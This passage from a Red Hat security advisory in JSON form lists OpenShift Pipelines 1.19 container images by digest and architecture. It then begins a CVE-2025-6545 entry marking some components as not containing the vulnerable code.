"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-6545",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2025-06-23T19:00:51.575615+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
